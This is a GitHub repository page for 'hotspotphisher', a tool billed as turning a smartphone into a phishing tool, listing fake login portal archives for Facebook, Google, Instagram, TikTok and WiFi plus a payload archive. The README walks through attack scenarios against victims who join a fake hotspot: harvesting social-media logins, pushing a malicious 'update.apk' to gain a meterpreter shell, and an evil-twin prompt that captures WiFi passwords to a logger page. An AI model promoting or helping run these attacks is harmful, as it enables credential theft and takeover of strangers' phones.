Ishanhore / hotspotphisher Public

forked from hxrofo/hotspotphisher

Notifications You must be signed in to change notification settings
Fork 0
Star 0

Turn Your Smart Phone into a Phishing Tool

Notifications

Name		Name	Last commit message	Last commit date
Latest commit History 38 Commits
images		images
README.md		README.md
facebook.zip		facebook.zip
fb-security.zip		fb-security.zip
google.zip		google.zip
hsp-v2.sh		hsp-v2.sh
instagram.zip		instagram.zip
payload.zip		payload.zip
tiktok.zip		tiktok.zip
wifi.zip		wifi.zip

Repository files navigation

I made this basic script and tested it on Kali Nethunter.
You don't need a second wireless interface or monitor mode. wlan0 is enough.
Note 1: You need 3G/LTE connection enabled, even if your data is 0 megabytes.

1. Scenario 1: facebook phishing

2. Scenario 2: fake plugin update with android APK

Create an android payload (update.apk).
When the victim connects to the fake hotspot, he will get a splash screen asking him to download a necessary plugin update (update.apk)
If he installs the apk, you'll get a meterpreter shell.

3. Scenario 3: Wifi Password Pop up

In this scenario, you can name your hotspot the same name as any wifi network around you, and if the victim connects to it by mistake, he's greeted with a pop up login box that asks for the wifi password.

You can access the logged credentials in the browser.
http://127.0.0.1:8080/logger.html

Feel free to improve the script by modifying the code or providing other fake portals